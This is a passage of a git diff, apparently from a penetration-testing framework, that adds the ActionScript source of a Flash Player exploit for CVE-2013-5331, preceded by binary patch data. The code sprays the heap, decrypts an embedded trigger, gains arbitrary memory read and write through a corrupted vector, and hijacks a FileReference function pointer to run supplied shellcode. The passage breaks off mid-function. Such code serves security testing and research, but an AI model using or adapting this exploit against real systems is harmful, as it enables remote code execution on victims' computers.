z8%Pq|$`YOd!AP$Kct~PcZg@^9K#CkBhz0>}a)DiCMrFu_VyJXPk#LSpTNweKs4$I%A9g6dVMoc?MK~>QZez^R@4s4Rph>U3# zrSLq?t(00vQYI*S4sHeKScG4YA{Sst)FDzv5STazXD}dyDM6*70z6?2PbqMpMFvrb z0XPUD7m)+10j9DXv$J6!B0+P8iTfC>@yRV#?};^DkUmYWeW6|8G+D6If@z+ z#5mRla#Th#gh7Cq@XUZowk-F*i{balpx?u3$9`4Su~Gh35x);t4#vN5ZpQ<0J|v3b}CG0V+{6=uqGifGJ0|LFf{FibN8c!0^lpmVgqI zn7Q`kT#Ygi5d%|zlch2i6qKP6B|1WxqSJG54VRG;T7aMMlqshjP05u6`m`p><^UW| z(mYMTmjDOQAbC!#PKeAv280O^AP^e?58weJqX<_jbIUCHzjPSL0pc8I4KyXCb)sPa zLC20v5Dw?g<|m|gk=ea2Q?xjHYNs#Ai#)PAPDWz<&_v5iBP93Ap%KAkr(h3S`D_DgS03| zH?yDxAd-;;XCH!tN}f`{i$yqcP!9GZ+yG6k{!j{3vlKKLrx`YD8AXy54h<-0Ffkfm zq$~;)?z(C-$a*9qLyhZiI2CeG99-9g64&VkT6PiAB+qcj#E60&z`tAq;}RX%W-;S9 z`!TL18XOuciV9(;5r_Z>!H5DZ-1Tf?txQm<+D1U41sNK&2Mfml9Bx2LF8w%7pz{ff zG6j@Xgx<_>FjP5EP9=Jvgn!ts;{uJipxX1;9UcJyijD)wfr>%EG>y<6(9e<#l&oT$ z-K@-^B;!au$TDM*<(4VOGRTZUHGr;Toe^D>0sui{XB!z;6l9C!Vawn<#;io*aG1_B zSC6Q2bX8;+>f)FQcS@6pa*~P!O(;^Bic!nZZwUiHaO6sWKne1(3_OPeUQQw|IZlfx z37`-OH#i-k=CGFp@x-~@&;$jEHVznaiL)#y&7G?hwr32E{-7h2qXq@j6vPZv6u7~` z4vikC8wZvcCtIGlY5|=p1OVsv1ZO9#0%zD1(aBLCIOXcx;9~+i0_OoInI>qYC`@Us zJ1a*tsl07&j^cxPX-RdoxgdXKqWC~I4?f81q8Bf9&|&q+71MviTrL3jrKKI? z#_P^%_iWpC{BEbyZ!A3+HuiU%(?ABip9{%+JpNsP`A#7f*EH3pI+f%zf z5swc)5nH<_PY>^i0LMT6i=<0%uhBF8FD_m) zofVkAD!QloHH5Zju%uq-a8mV^wl)^g(A6{DZl_yscltB7gW0NaCab2Yvp>-sE&+|jZZYkb`C19gr#y=_QP^DEC*qw7MAM=tEC_;H$s0j493D> zJPannpcw{x!eBBC_J-xDFxVG{PlUn#FgOqfPldtLVfkPfJQD_o!eAy0o(+Rfg~4-S z&IS*bFDYq9S zp^^vvrIAw2FL|SIxK^(W$g7yDhV{n#cy4+9pA61=gNri*`>g%c!c56NXIn?f!r{`@ z>6Ulv?%-nOT*bRO=AN4{T_4!7^~=v+4&ExYN-vkh?D~7R?ye7PW8Xh-ZWcnH+9fow zBTmXq*x8mh=kHi?w^(tnSk=NRH)uAumfP74C%p0At$Q1-nSKAdx%pt--)(LlUY%*p z+=lX&|6!}P_T9en=c=t>4Vq>jwcjd#xXXnAE=YfEOWB>x&B4XJ=k|J6CkJ-&Xnf%X zteG5$PY(umYT=2}YUzloUOr+!BaX`Ig*i`FTb?*p`1~v^$?C$qH?aGD(Eo|7%Bnrq z@^6b{vU=wNDHRT5E^7JT-M6v1Ib3=%J{Nnd@evh3A1z%>26q49wL@R>E+my#9c+Sn zz*9-GR}xglns`hKIGU-rcy!)?3X5R=$vxFkN1Q zDBSVg?lxWnRDx!`@n^LGdG?kX!S5)3$M8Fj--*llt-JWW=M4BWs})ssm%t4}cc~3* z^ZBWg=e-I?THZJyJa}F--7A+e)fh%zHJUFCLoXY4*78;vvHx)I^N`-2!o*$xS2nP6 zYZCbg#cXrJ&Ata6vf+~QrwEpNn5uc+#p6fMoI75sxCM2KG>**Gkj-L<0N7bE?z|Wo z*m29}YRQqdEY-3>x!T_)6S?9 zT6aQ^zJTK5-Ijso@479GKXCg4JBv&?FB;M>R?i_=BhKI5NN@c@6BiNvts$Z=)o-f2E9*8+uHPO=^%DNdS4XTZL+9HF z>uDFsZN_t#As0!1eF8dga~d2OqE$kn^b3t!vbClvX!!$-L6InxdmHoBsXEHO?B1UB zyp8#w7?<3bV>~xD^$eUV2z9t1ECdR5`+=OM6B;k(DsIl9={x91E>9n>$r_9YJ53%@ z^|^_u5Y8gSUn;*Q>vPTB!#%r(^R=DBpcO!2*j#^XBXg5ePopgSZC4lk(%jyMu71z$ zt^R!{IQ6*TzK5IsRVUbRg7YI&^N$G5k3L*m-kKVF7{Hg@+VR53^y6zM9$P#2#O}Bq z*%7z3zH5VS)1DVr(fEF+G$6ZSFlWcc#`UarxW{)WU@LIK~>Vpmv7>ojy8?Dw_ z|6VgFo^Ipm$H1~%H9CY;wRw1`M^+F2yzJ)Y%Y~8|Fsz&1QjfYVWL7I%GCy|R8&1~T z!RclJS1|ByyjGjfZ7bj5WVJ-hnt(I`jIk@qR$P8@h+bvmp?}?zeFyd kB9~t#m+ScV%ih7_=V}e2qkG+d({BIAEwJbP585Fu{H)Evvj6}9 literal 0 HcmV?d00001 diff --git a/external/source/exploits/CVE-2013-5331/Exploit.as b/external/source/exploits/CVE-2013-5331/Exploit.as new file mode 100755 index 0000000000..801edd0184 --- /dev/null +++ b/external/source/exploits/CVE-2013-5331/Exploit.as @@ -0,0 +1,897 @@ +//Compile: mxmlc.exe Exploit.as -o Exploit.swf + +package +{ + import flash.display.Sprite; + import flash.utils.ByteArray; + import flash.net.LocalConnection; + import flash.utils.Endian; + import flash.net.FileReference; + import __AS3__.vec.Vector; + import flash.system.Capabilities; + import flash.display.Loader; + import flash.utils.setTimeout; + + import flash.display.LoaderInfo; + + public class Exploit extends Sprite + { + var number_massage_vectors:uint = 0x18000; + var len_massage_vector:uint = 0x36; + var maxElementsPerPage:uint = 0xe00012; + var massage_array:Array; + var tweaked_vector; + var tweaked_vector_address; + var done:Boolean = false; + var receiver:LocalConnection; + // Embedded trigger, ActionScript source available at the end of this file as code comment. + var trigger_swf:String = "78da75565f4c9357144ff6b2cca7252ed91e966d2e2c35e0a605bc681d9f11a94f4b85745b05b2f0325c78d3651ad0173666d8941998a2d9f857a0aed8de425b4a59a1a520855908f4cf6de1d2967e03d9a2885127713a37d8b9f7fba0b0cc872fdc9eef777ee79cdf39dfb9343c2b0bf75c43d48cb36a08de5f41f07bb3e4b682128c1a435abf62b93b3f49f0a027fc15ea27e3c52ebd0fb9fbc5230e7b14fdd84f4b5c1db775d88e0b6c5e8abcce91125a3d52ea34f2df5a931e7f6ed3278a5d567f89c743cfba3a964a1d467f3eb5b5a0c1fea1bc25122872b8936a6a1f3a62b58bc864a7a57d7a5ce8edc5451686bb9cd4b9fbfdc7f0e5a1a2ee86d162ec4ca281c171d4e81e2a32b54ce699fa2327781c327ff4823159ea74b420b3939e6a68c067dbaa68becd33f122d5fbf35a2f2fa1ceb691bc3e63f4888724b58039eb218f0a1dee299d83dc2b7342dc2e27fea09d4ce69bc8bd7c13d466230b877b6d90437b5c6b3246510f19d675d68fe6f5da132c87f25e3bf09b71890be2eac944e160ad5c8b63a2a046aea7d7398c1cce1b857800170f905f8b06ec43a7fa3c37b403c6d1222799542f7947746ee74d84ddf7caee1251ebecc3fa0962406204231ae9449498b3a10fc26c40954de35d159a1016e25575fa3562c8146718a67b1da39c857e892166b3fcc7ef3af74b56b1334ed744b012fa898261ab3e460cca2bea2e148caf6dd30c612114c1e06746c0a58ca530d91c1304cc0a16c2525e7ba98c11c32c6617b3e5d0ad7e59dc2fbac6ce077d6a3312a3808d5bd2593e6233cbc750b6a8ee43416af6bf02be7497168904fb6904e68e983381ef8b45750f0a8a12f7ec7a3cc643d8b3099334fb19e6278659fe3f4c2d0ace5d47c104d7660f259da7d97b7191e5df0838c3011fcb57e4b9e7fad42e24ae6ee1c94d696ae69ade845e10625024898ca9572925fd0d399c2bb2c0b8d22edc673e1eae3dab2138c463bc7ddec7eced29fb18b7bf25d937eb34c8e3059a55efd0b843f9183410ef1864dd0dbb792cff6aa566060b237157fa28fbbdd1bb4ee89de15d5f93ea008d5bf75039d7e0d472868662616ca3be3a86dfe9535f871ed422da38688e9126c4e2fa78cdf674cd08e6feeee80b521fe23da7af32fe49f0abb675c7c8ab7ea845188bdc7c0edfb9ad7c707ed2a4ca84b330165065d108d444ee661c0ae11505e3fdc390c96b7bb89021d5e67d5e6dc0f19d90e0bc172b4699fd8141c17dff045f88f32ca07a5ffea6d013822b65db3e1ae9009ba9fce1b3e5375ca70e71bb3fc0f8be81f7b7f40962d81e9c9366e2ca14b39f17a6791c3dc46943c11593ac1f16462fd9d83cecdc9887fba93a57b9cfd71575c3ca6c3a8f19dfcb3cbf49ebe67385661a2b15e01bd9d0e56fa647b5426d84f71bb1784d639cf35bceffa079314d1dc2a729e359b1cadac3f9b17ce673743e5df25bd0cf810e945854ad5be3d42b980fd40b75e706a995eb31cdf5d00b11d003b8f6f998be49f85ef84c9d4bcdd4d3e56d0cbf1650e5d2788db0c2f793e14d9ec7eaea0ea9871ee8a143de1b96f5bd2148bd815e32ecc4ea0ebaeb1ae3cde1dccbedbbf9398ccb6baa273feab14f68cdffa476be62ae19701654d08a0fd2da89e23edb64316d8996e1b6d163de795cd2661d2ea0ec91ee844d7781a8c575f327a8c39fd7d8b2847ea85ad3e2ea645167c390ceabe73d423c9ff042dab8a60b6d27f20e851a673f69473484f70e13aca3640afd4554aad4aee8cc8e7f39a04f92ce9c6048de05c18533a5619c73959d09ef490edf8f33d652d0257316f634bccf0e80b689b061cfc7090c7bb8eb751a1e3ecaeebc6922ef04d0303e63a9bc2ae19487a759bc36fe5d49bba9bbe2f726952069db25506eb3f0fd31d7ccf613ef89f09b0ffb432cdf10cff9a5e971f80bf169eda3e32eeb2f3aaf537cadc1b40677ec8dc23b44bbef0ef42b46d2ced0182ef77a473e747937ddb183517667b347d29c24f2fb8c23796d1d7e761f9f6c6dc0851ee3dd932d70d75e70d2e32677e284c33ea1a69bb51866fbe1335e879cf3cfd304f209f6226ac7f0bfc745a411f1c6ac2542dd9f06d426a641b6bc0ff65e69cd8019b9b5b96fec9ce9eb87f99db140fdf03e3400b30d7d89bebd9fcd4cec29cee935c1fd4ddad7358459efce9c6dba25e12239592c5e94a47672bcf9fb4a4d5cdad9b1f5796896ef5ad8e571f62dc4eb77d04b90ebbffc1db134"; + var key:uint = 3.627461843E9; + var shellcodeObj:Array; + + public function Exploit() { + var trigger_decrypted:uint = 0; + super(); + shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(","); + var i:* = 0; + this.massage_array = new Array(); + + // Memory massage + i = 0; + while(i < this.number_massage_vectors) + { + this.massage_array[i] = new Vector.(1); + i++; + } + i = 0; + while(i < this.number_massage_vectors) + { + this.massage_array[i] = new Vector.(this.len_massage_vector); + this.massage_array[i][0] = 0x41414141; + i++; + } + var j:* = 0; + i = 0; + while(i < this.number_massage_vectors) + { + j = 0; + while(j < 32) + { + this.massage_array[i][j] = 0x41414141; + j++; + } + i++; + } + var k:uint = (4096 - 32) / (this.len_massage_vector * 4 + 8); + i = 65536 + 6; + while(i < this.number_massage_vectors) + { + this.massage_array[i] = new Vector.(this.len_massage_vector * 2); + this.massage_array[i][0] = 0x42424242; + i = i + k; + } + + // Decompress/Decrypt trigger + this.receiver = new LocalConnection(); + this.receiver.connect("toAS3"); + this.receiver.client = this; + var trigger_byte_array:ByteArray = this.createByteArray(this.trigger_swf); + trigger_byte_array.endian = Endian.LITTLE_ENDIAN; + trigger_byte_array.uncompress(); + trigger_byte_array.position = 0; + i = 0; + while(i < trigger_byte_array.length / 4) + { + trigger_decrypted = trigger_byte_array.readUnsignedInt() ^ this.key; + trigger_byte_array.position = trigger_byte_array.position - 4; + trigger_byte_array.writeUnsignedInt(trigger_decrypted); + i++; + } + trigger_byte_array.position = 0; + + // Trigger corruption + var trigger_loader:Loader = new Loader(); + trigger_loader.loadBytes(trigger_byte_array); + + // Handler to check for corruption + setTimeout(this.as2loaded,4000,[]); + } + + function createByteArray(hex_string:String) : ByteArray { + var byte:String = null; + var byte_array:ByteArray = new ByteArray(); + var hex_string_length:uint = hex_string.length; + var i:uint = 0; + while(i < hex_string_length) + { + byte = hex_string.charAt(i) + hex_string.charAt(i + 1); + byte_array.writeByte(parseInt(byte,16)); + i = i + 2; + } + return byte_array; + } + + // When param1.length > 0 it's called from the corruption trigger + // Else it's called because of the timeout trigger + public function as2loaded(param1:Array) : * { + var back_offset:* = undefined; // backward offset from the tweaked vector + var j:* = undefined; + var _loc15_:uint = 0; + var ninbets:Array = null; + var array_with_code:Array = null; + var address_code:uint = 0; + var _loc19_:uint = 0; + if(this.done == true) + { + return; + } + if(param1.length > 0) + { + this.done = true; + } + var corrupted_index:uint = 0; + var i:* = 0; + i = 0x10000 + 6; + + // Search corrupted vector + while(i < this.number_massage_vectors) + { + if(this.massage_array[i].length != 2 * this.len_massage_vector) + { + if(this.massage_array[i].length != this.len_massage_vector) + { + corrupted_index = i; + this.massage_array[i][0] = 0x41424344; + break; + } + } + i++; + } + + // throw Error if any vector has been corrupted + if(i == this.number_massage_vectors) + { + throw new Error("not found"); + } + else // start the magic... + { + // Tweak the length for the vector next to the corrupted one + this.massage_array[corrupted_index][this.len_massage_vector] = 0x40000001; + // Save the reference to the tweaked vector, it'll work with this one to leak and corrupt arbitrary memory + this.tweaked_vector = this.massage_array[corrupted_index + 1]; + var offset_length = 0; + // Ensure tweaked vector length corruption, I guess the offset to the vector length + // changes between flash versions + if(this.tweaked_vector.length != 0x40000001) + { + this.massage_array[corrupted_index][this.len_massage_vector + 10] = 0x40000001; + offset_length = 10; + } + if(param1.length > 0) // From the corruption trigger + { + // Fix the massage array of vectors, restores the corrupted vector and + // marks it as the last one. + back_offset = (4 * (this.len_massage_vector + 2) - 100) / 4 + this.len_massage_vector + 2; // 87 + j = 0; + /* + tweaked_vector->prior->prior, some data is overwritten, is used for search purposes + tweaked_vector[3fffffa7] = 0 + tweaked_vector[3fffffa8] = 0 + tweaked_vector[3fffffa9] = 1c0340 + tweaked_vector[3fffffaa] = ffffffff + tweaked_vector[3fffffab] = 0 + tweaked_vector[3fffffac] = 0 + tweaked_vector[3fffffad] = 0 + tweaked_vector[3fffffae] = 0 + tweaked_vector[3fffffaf] = 0 + tweaked_vector[3fffffb0] = 0 + tweaked_vector[3fffffb1] = 0 + tweaked_vector[3fffffb2] = 100 + tweaked_vector[3fffffb3] = 0 + tweaked_vector[3fffffb4] = 0 + tweaked_vector[3fffffb5] = 0 + tweaked_vector[3fffffb6] = 0 + tweaked_vector[3fffffb7] = 100dddce + tweaked_vector[3fffffb8] = 0 + tweaked_vector[3fffffb9] = 1df6000 + tweaked_vector[3fffffba] = 1dc2380 + tweaked_vector[3fffffbb] = 0 + tweaked_vector[3fffffbc] = 10000 + tweaked_vector[3fffffbd] = 70 + tweaked_vector[3fffffbe] = 0 + tweaked_vector[3fffffbf] = 4 + tweaked_vector[3fffffc0] = 0 + tweaked_vector[3fffffc1] = 1de7090 + tweaked_vector[3fffffc2] = 4 + tweaked_vector[3fffffc3] = 0 + tweaked_vector[3fffffc4] = 0 + tweaked_vector[3fffffc5] = 0 + // tweaked_vector->prior + tweaked_vector[3fffffc6] = 36 // Length + tweaked_vector[3fffffc7] = 1dea000 + tweaked_vector[3fffffc8] = 41414141 + tweaked_vector[3fffffc9] = 41414141 + tweaked_vector[3fffffca] = 41414141 + tweaked_vector[3fffffcb] = 41414141 + tweaked_vector[3fffffcc] = 41414141 + tweaked_vector[3fffffcd] = 41414141 + tweaked_vector[3fffffce] = 41414141 + tweaked_vector[3fffffcf] = 41414141 + tweaked_vector[3fffffd0] = 41414141 + tweaked_vector[3fffffd1] = 41414141 + tweaked_vector[3fffffd2] = 41414141 + tweaked_vector[3fffffd3] = 41414141 + tweaked_vector[3fffffd4] = 41414141 + tweaked_vector[3fffffd5] = 41414141 + tweaked_vector[3fffffd6] = 41414141 + tweaked_vector[3fffffd7] = 41414141 + tweaked_vector[3fffffd8] = 41414141 + tweaked_vector[3fffffd9] = 41414141 + tweaked_vector[3fffffda] = 41414141 + tweaked_vector[3fffffdb] = 41414141 + tweaked_vector[3fffffdc] = 41414141 + tweaked_vector[3fffffdd] = 41414141 + tweaked_vector[3fffffde] = 41414141 + tweaked_vector[3fffffdf] = 41414141 + tweaked_vector[3fffffe0] = 41414141 + tweaked_vector[3fffffe1] = 41414141 + tweaked_vector[3fffffe2] = 41414141 + tweaked_vector[3fffffe3] = 41414141 + tweaked_vector[3fffffe4] = 41414141 + tweaked_vector[3fffffe5] = 41414141 + tweaked_vector[3fffffe6] = 41414141 + tweaked_vector[3fffffe7] = 41414141 + tweaked_vector[3fffffe8] = 0 + tweaked_vector[3fffffe9] = 0 + tweaked_vector[3fffffea] = 0 + tweaked_vector[3fffffeb] = 0 + tweaked_vector[3fffffec] = 0 + tweaked_vector[3fffffed] = 0 + tweaked_vector[3fffffee] = 0 + tweaked_vector[3fffffef] = 0 + tweaked_vector[3ffffff0] = 0 + tweaked_vector[3ffffff1] = 0 + tweaked_vector[3ffffff2] = 0 + tweaked_vector[3ffffff3] = 0 + tweaked_vector[3ffffff4] = 0 + tweaked_vector[3ffffff5] = 0 + tweaked_vector[3ffffff6] = 0 + tweaked_vector[3ffffff7] = 0 + tweaked_vector[3ffffff8] = 0 + tweaked_vector[3ffffff9] = 0 + tweaked_vector[3ffffffa] = 0 + tweaked_vector[3ffffffb] = 0 + tweaked_vector[3ffffffc] = 0 + tweaked_vector[3ffffffd] = 0 + */ + while(j < back_offset) + { + this.tweaked_vector[0x40000000 - back_offset - 2 + j - offset_length] = param1[j]; + j++; + } + // tweaked_vector[3fffffff] = 1dea000 // Restores tweaked vector metadata + this.tweaked_vector[0x40000000-1] = param1[back_offset + 1]; + + + j = back_offset + 2; + + // Modifies the tweaked vector content, and overflow the next ones, they just remain in good state: + /* + // tweaked vector content + tweaked_vector[0] = 41414141 + tweaked_vector[1] = 41414141 + tweaked_vector[2] = 41414141 + tweaked_vector[3] = 41414141 + tweaked_vector[4] = 41414141 + tweaked_vector[5] = 41414141 + tweaked_vector[6] = 41414141 + tweaked_vector[7] = 41414141 + tweaked_vector[8] = 41414141 + tweaked_vector[9] = 41414141 + tweaked_vector[a] = 41414141 + tweaked_vector[b] = 41414141 + tweaked_vector[c] = 41414141 + tweaked_vector[d] = 41414141 + tweaked_vector[e] = 41414141 + tweaked_vector[f] = 41414141 + tweaked_vector[10] = 41414141 + tweaked_vector[11] = 41414141 + tweaked_vector[12] = 41414141 + tweaked_vector[13] = 41414141 + tweaked_vector[14] = 41414141 + tweaked_vector[15] = 41414141 + tweaked_vector[16] = 41414141 + tweaked_vector[17] = 41414141 + tweaked_vector[18] = 41414141 + tweaked_vector[19] = 41414141 + tweaked_vector[1a] = 41414141 + tweaked_vector[1b] = 41414141 + tweaked_vector[1c] = 41414141 + tweaked_vector[1d] = 41414141 + tweaked_vector[1e] = 41414141 + tweaked_vector[1f] = 41414141 + tweaked_vector[20] = 0 + tweaked_vector[21] = 0 + tweaked_vector[22] = 0 + tweaked_vector[23] = 0 + tweaked_vector[24] = 0 + tweaked_vector[25] = 0 + tweaked_vector[26] = 0 + tweaked_vector[27] = 0 + tweaked_vector[28] = 0 + tweaked_vector[29] = 0 + tweaked_vector[2a] = 0 + tweaked_vector[2b] = 0 + tweaked_vector[2c] = 0 + tweaked_vector[2d] = 0 + tweaked_vector[2e] = 0 + tweaked_vector[2f] = 0 + tweaked_vector[30] = 0 + tweaked_vector[31] = 0 + tweaked_vector[32] = 0 + tweaked_vector[33] = 0 + tweaked_vector[34] = 0 + tweaked_vector[35] = 0 + // next to the tweaked vector + tweaked_vector[36] = 36 + tweaked_vector[37] = 1dea000 + tweaked_vector[38] = 41414141 + tweaked_vector[39] = 41414141 + tweaked_vector[3a] = 41414141 + tweaked_vector[3b] = 41414141 + tweaked_vector[3c] = 41414141 + tweaked_vector[3d] = 41414141 + tweaked_vector[3e] = 41414141 + tweaked_vector[3f] = 41414141 + tweaked_vector[40] = 41414141 + tweaked_vector[41] = 41414141 + tweaked_vector[42] = 41414141 + tweaked_vector[43] = 41414141 + tweaked_vector[44] = 41414141 + tweaked_vector[45] = 41414141 + tweaked_vector[46] = 41414141 + tweaked_vector[47] = 41414141 + tweaked_vector[48] = 41414141 + tweaked_vector[49] = 41414141 + tweaked_vector[4a] = 41414141 + tweaked_vector[4b] = 41414141 + tweaked_vector[4c] = 41414141 + tweaked_vector[4d] = 41414141 + tweaked_vector[4e] = 41414141 + tweaked_vector[4f] = 41414141 + tweaked_vector[50] = 41414141 + tweaked_vector[51] = 41414141 + tweaked_vector[52] = 41414141 + tweaked_vector[53] = 41414141 + tweaked_vector[54] = 41414141 + tweaked_vector[55] = 41414141 + tweaked_vector[56] = 41414141 + tweaked_vector[57] = 41414141 + tweaked_vector[58] = 0 + tweaked_vector[59] = 0 + tweaked_vector[5a] = 0 + tweaked_vector[5b] = 0 + tweaked_vector[5c] = 0 + tweaked_vector[5d] = 0 + tweaked_vector[5e] = 0 + tweaked_vector[5f] = 0 + tweaked_vector[60] = 0 + tweaked_vector[61] = 0 + tweaked_vector[62] = 0 + tweaked_vector[63] = 0 + tweaked_vector[64] = 0 + tweaked_vector[65] = 0 + tweaked_vector[66] = 0 + tweaked_vector[67] = 0 + tweaked_vector[68] = 0 + tweaked_vector[69] = 0 + tweaked_vector[6a] = 0 + tweaked_vector[6b] = 0 + tweaked_vector[6c] = 0 + tweaked_vector[6d] = 0 + // next -> next to the tweaked vector + tweaked_vector[6e] = 36 + tweaked_vector[6f] = 1dea000 + tweaked_vector[70] = 41414141 + tweaked_vector[71] = 41414141 + tweaked_vector[72] = 41414141 + tweaked_vector[73] = 41414141 + tweaked_vector[74] = 41414141 + tweaked_vector[75] = 41414141 + tweaked_vector[76] = 41414141 + tweaked_vector[77] = 41414141 + tweaked_vector[78] = 41414141 + tweaked_vector[79] = 41414141 + tweaked_vector[7a] = 41414141 + tweaked_vector[7b] = 41414141 + tweaked_vector[7c] = 41414141 + tweaked_vector[7d] = 41414141 + tweaked_vector[7e] = 41414141 + tweaked_vector[7f] = 41414141 + tweaked_vector[80] = 41414141 + tweaked_vector[81] = 41414141 + tweaked_vector[82] = 41414141 + tweaked_vector[83] = 41414141 + tweaked_vector[84] = 41414141 + tweaked_vector[85] = 41414141 + tweaked_vector[86] = 41414141 + tweaked_vector[87] = 41414141 + tweaked_vector[88] = 41414141 + tweaked_vector[89] = 41414141 + tweaked_vector[8a] = 41414141 + tweaked_vector[8b] = 41414141 + tweaked_vector[8c] = 41414141 + tweaked_vector[8d] = 41414141 + tweaked_vector[8e] = 41414141 + tweaked_vector[8f] = 41414141 + tweaked_vector[90] = 0 + tweaked_vector[91] = 0 + tweaked_vector[92] = 0 + tweaked_vector[93] = 0 + tweaked_vector[94] = 0 + tweaked_vector[95] = 0 + tweaked_vector[96] = 0 + tweaked_vector[97] = 0 + tweaked_vector[98] = 0 + tweaked_vector[99] = 0 + tweaked_vector[9a] = 0 + tweaked_vector[9b] = 0 + tweaked_vector[9c] = 0 + tweaked_vector[9d] = 0 + tweaked_vector[9e] = 0 + tweaked_vector[9f] = 0 + tweaked_vector[a0] = 0 + tweaked_vector[a1] = 0 + tweaked_vector[a2] = 0 + tweaked_vector[a3] = 0 + tweaked_vector[a4] = 0 + tweaked_vector[a5] = 0 + */ + while(j < param1.length) + { + this.tweaked_vector[j - (back_offset + 2) + offset_length] = param1[j]; + j++; + } + // next -> next to the tweaked vector + // tweaked_vector[a6] = 36 + // tweaked_vector[a7] = 1dea000 + this.tweaked_vector[2 * (this.len_massage_vector + 2) + this.len_massage_vector + offset_length] = param1[back_offset]; // [166] => 36 + this.tweaked_vector[2 * (this.len_massage_vector + 2) + this.len_massage_vector + 1 + offset_length] = param1[back_offset + 1]; //[167] => 1dea000 + } + else // From the Timeout trigger; never reached on my tests. + { + _loc15_ = this.tweaked_vector[4 * (this.len_massage_vector + 2)-1]; + this.tweaked_vector[0x3fffffff] = _loc15_; + this.tweaked_vector[0x3fffffff - this.len_massage_vector - 2] = _loc15_; + this.tweaked_vector[0x3fffffff - this.len_massage_vector - 3] = this.len_massage_vector; + this.tweaked_vector[this.len_massage_vector + 1] = _loc15_; + this.tweaked_vector[2 * (this.len_massage_vector + 2)-1] = _loc15_; + this.tweaked_vector[3 * (this.len_massage_vector + 2)-1] = _loc15_; + this.tweaked_vector[this.len_massage_vector] = this.len_massage_vector; + this.tweaked_vector[2 * (this.len_massage_vector + 2) - 2] = this.len_massage_vector; + this.tweaked_vector[3 * (this.len_massage_vector + 2) - 2] = this.len_massage_vector; + } + + this.massage_array[corrupted_index].length = 256; // :? + + // Search backwards to find the massage array metadata + // It's used to disclose the tweaked vector address + i = 0; + var hint = 0; + while(true) + { + hint = this.tweaked_vector[0x40000000 - i]; + if(hint == this.maxElementsPerPage-1) // 0xe00012 - 1 + { + break; + } + i++; + } + + this.tweaked_vector_address = 0; + if(this.tweaked_vector[0x40000000 - i - 4] == 0) + { + throw new Error("error"); + } + else + { + this.tweaked_vector_address = this.tweaked_vector[0x40000000 - i - 4] + (4 * this.len_massage_vector + 8) + 8 + 4 * offset_length; + + // I have not been able to understand this tweak, + // Maybe not necessary at all... + i = 0; + hint = 0; + while(true) + { + hint = this.tweaked_vector[0x40000000 - i]; + if(hint == 0x7e3f0004) + { + break; + } + i++; + } + + this.tweaked_vector[0x40000000 - i + 1] = 4.294967295E9; // -1 / 0xffffffff + // End of maybe not necessary tweak + + var file_ref_array = new Array(); + i = 0; + while(i < 64) + { + file_ref_array[i] = new FileReference(); + i++; + } + + var file_reference_address = this.getFileReferenceLocation(this.tweaked_vector, this.tweaked_vector_address); + var ptr_backup = this.getMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32); + + // Get array related data, important to trigger the desired corruption to achieve command execution + ninbets = this.getNinbets(this.tweaked_vector,this.tweaked_vector_address); + array_with_code = this.createCodeVectors(0x45454545, 0x90909090); + address_code = this.getCodeAddress(this.tweaked_vector, this.tweaked_vector_address, 0x45454545); + this.fillCodeVectors(array_with_code, address_code); + this.tweaked_vector[7] = ninbets[0] + 0; + this.tweaked_vector[4] = ninbets[1]; + this.tweaked_vector[0] = 4096; + this.tweaked_vector[1] = address_code & 0xfffff000; + // Corruption + this.writeMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32, this.tweaked_vector_address + 8); + // Get arbitrary execution + i = 0; + while(i < 64) + { + file_ref_array[i].cancel(); + i++; + } + this.tweaked_vector[7] = address_code; + i = 0; + while(i < 64) + { + file_ref_array[i].cancel(); + i++; + } + // Restore Function Pointer + this.writeMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32, ptr_backup); + + return; + } + } + } + + // vector: tweaked vector with 0x40000001 length + // vector_address: address of tweaked vector + // address: address to read + function getMemoryAt(vector:Vector., vector_address:uint, address:uint) : uint { + if(address >= vector_address) + { + return vector[(address - vector_address) / 4]; + } + return vector[0x40000000 - (vector_address - address) / 4]; + } + + // vector: tweaked vector with 0x40000001 length + // vector_address: address of tweaked vector + // address: address to write + // value: value to write + function writeMemoryAt(vector:Vector., vector_address:uint, address:uint, value:uint) : * { + if(address >= vector_address) + { + vector[(address - vector_address) / 4] = value; + } + else + { + vector[0x40000000 - (vector_address - address) / 4] = value; + } + } + + function getNinbets(vector:*, vector_address:*) : Array { + var _loc9_:uint = 0; + var array_related_addr:uint = this.getMemoryAt(vector,vector_address,(vector_address & 0xfffff000) + 0x1c); + var index_array_related_addr:uint = 0; + var _loc5_:uint = 0; + var _loc6_:uint = 0; + if(array_related_addr >= vector_address) + { + index_array_related_addr = (array_related_addr - vector_address) / 4; + } + else + { + index_array_related_addr = 0x40000000 - (vector_address - array_related_addr) / 4; + } + var _loc7_:uint = 0; + while(true) + { + index_array_related_addr--; + _loc9_ = vector[index_array_related_addr]; + if(_loc9_ == 0xfff870ff) + { + _loc7_ = 2; + break; + } + if(_loc9_ == 0xf870ff01) + { + _loc7_ = 1; + break; + } + if(_loc9_ == 0x70ff016a) + { + _loc9_ = vector[index_array_related_addr + 1]; + if(_loc9_ == 0xfc70fff8) + { + _loc7_ = 0; + break; + } + } + else + { + if(_loc9_ == 0x70fff870) + { + _loc7_ = 3; + break; + } + } + } + + _loc5_ = vector_address + 4 * index_array_related_addr - _loc7_; + index_array_related_addr--; + var _loc8_:uint = vector[index_array_related_addr]; + if(_loc8_ == 0x16a0424) + { + return [_loc5_,_loc6_]; + } + if(_loc8_ == 0x6a042444) + { + return [_loc5_,_loc6_]; + } + if(_loc8_ == 0x424448b) + { + return [_loc5_,_loc6_]; + } + if(_loc8_ == 0xff016a04) + { + return [_loc5_,_loc6_]; + } + + _loc6_ = _loc5_ - 6; + while(true) + { + index_array_related_addr--; + _loc9_ = vector[index_array_related_addr]; + if(_loc9_ == 0x850ff50) + { + if(uint(vector[index_array_related_addr + 1]) == 0x5e0cc483) + { + _loc7_ = 0; + break; + } + } + _loc9_ = _loc9_ & 0xffffff00; + if(_loc9_ == 0x50ff5000) + { + if(uint(vector[index_array_related_addr + 1]) == 0xcc48308) + { + _loc7_ = 1; + break; + } + } + _loc9_ = _loc9_ & 0xffff0000; + if(_loc9_ == 0xff500000) + { + if(uint(vector[index_array_related_addr + 1]) == 0xc4830850) + { + if(uint(vector[index_array_related_addr + 2]) == 0xc35d5e0c) + { + _loc7_ = 2; + break; + } + } + } + _loc9_ = _loc9_ & 0xff000000; + if(_loc9_ == 0x50000000) + { + 